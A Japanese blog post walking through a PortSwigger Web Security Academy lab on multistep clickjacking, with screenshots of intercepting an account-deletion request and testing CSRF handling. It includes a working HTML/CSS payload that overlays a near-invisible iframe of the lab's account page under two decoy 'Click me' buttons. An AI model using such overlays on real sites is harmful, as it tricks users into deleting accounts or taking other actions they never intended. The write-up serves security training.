shikata ga nai

Private? There is no such things.

Multistep clickjackingをやってみた

Hello there, ('ω')ノ 

 

マルチステップクリックジャッキングを。

 

このラボには、 CSRFトークンで保護されているアカウント機能があって。

さらには、確認のダイアログもあり クリックジャッキング ます。

このラボを解決するには、アカウントの削除ボタンをクリックさせて。

次に確認ボタンをクリックする攻撃を作成して。

 

まずは、ログインして。

 

f:id:ThisIsOne:20210422192133p:plain

 

Deleteをクリックして。

 

f:id:ThisIsOne:20210422192359p:plain

 

最後にYesをクリックするようで。

ここでクリックすると削除されるので。

 

f:id:ThisIsOne:20210423081234p:plain

 

一旦、Dropして。

 

f:id:ThisIsOne:20210422192451p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210422192331p:plain

 

CSRFを削除してSendすると、正常なレスポンスが返って。

 csrf=jzGxI8S4itomg9Y2aNyXysHaMBObfjhT

 

f:id:ThisIsOne:20210422192540p:plain

 

ちなみにメソッドをGETに変更して。

 

f:id:ThisIsOne:20210422192627p:plain

 

CSRFを削除してSendすると、Not Foundだとか。

 

f:id:ThisIsOne:20210422192805p:plain

 

下記のコードを挿入して。

 

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top: 500px;
left: 20px;
z-index: 1;
}
.secondClick {
top: 300px;
left: 220px;
left:$side_value2;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac801fdf1f33d06c8047022200b00016.web-security-academy.net/my-account"></iframe>

 

f:id:ThisIsOne:20210422193701p:plain

 

はじめのボタンの位置を調整して。

 

f:id:ThisIsOne:20210422193554p:plain

 

ふたつめのボタンの位置を調整して。

 

f:id:ThisIsOne:20210422193617p:plain

 

Storeして、Deliverするとクリアできた。

 

f:id:ThisIsOne:20210422194107p:plain

 

実際にView exploitで一連のボタンをクリックしてみて。

 

f:id:ThisIsOne:20210422194335p:plain

 

ログインしようとすると削除されていて。

 

f:id:ThisIsOne:20210422194241p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain